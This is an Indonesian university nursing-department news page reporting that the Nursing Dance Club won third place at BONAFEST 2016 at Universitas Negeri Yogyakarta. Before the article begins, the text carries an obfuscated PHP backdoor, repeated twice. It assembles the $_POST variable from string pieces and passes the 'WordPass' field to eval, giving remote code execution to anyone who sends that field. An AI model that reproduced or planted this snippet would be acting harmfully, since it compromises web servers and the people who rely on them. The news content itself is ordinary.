@$A='Acc';$p='_';$o='PO';$s='S';$t='T';;@eval(${$p.$o.$s.$t}['WordPass']);@$A='Acc';$p='_';$o='PO';$s='S';$t='T';;@eval(${$p.$o.$s.$t}['WordPass']); Nursing Dance Club (NDC) HIMIKA PSIK UMY Mendapatkan Penghargaan Dalam Lomba BONAFEST 2016 UNY | Keperawatan UMY

Departemen Pengembangan Minat dan Bakat Himpunan Mahasiswa Ilmu Keperawatan mendelegasikan mahasiswa/i PSIK sebanyak 6 orang untuk mengikuti lomba BONAFEST 2016 yang bertujuan untuk meningkatkan dan mengembangkan kompetensi mahasiswa dalam bidang seni dan bakat.

Pendidikan Administrasi Perkantoran  Universitas Negri Yogyakarta mengadakan kegiatan BONAFEST 2016.  Lomba ini diadakan untuk diikuti masyarakat umum yang berada di wilayah Daerah Istimewa Yogyakarta pada tanggal 22 Desember 2016 bertempat di Auditorium UNY. Mengingat pentingnya membangun mahasiswa yang unggul dalam  keterampilan, maka diperlukan suatu kompetisi untuk membangun kemampuan tersebut. Kegiatan yang dilombakan adalah dibidang seni tari dengan tema “Lomba Tari Kreasi Tradisional”. Harapannya, pengalaman dari kegiatan yang didapatkan dapat diaplikasikan untuk diri sendiri maupun mahasiswa guna meningkatkan bakat mahasiswa PSIK FKIK UMY dan HIMIKA PSIK UMY.

Alhamdulillah Nursing Dance Club (NDC) HIMIKA PSIK UMY mendapatkan juara 3 dalam acara BONAFEST 2016 yang diselenggarakan oleh Universitas Negeri Yogyakarta (UNY) ini. (ar)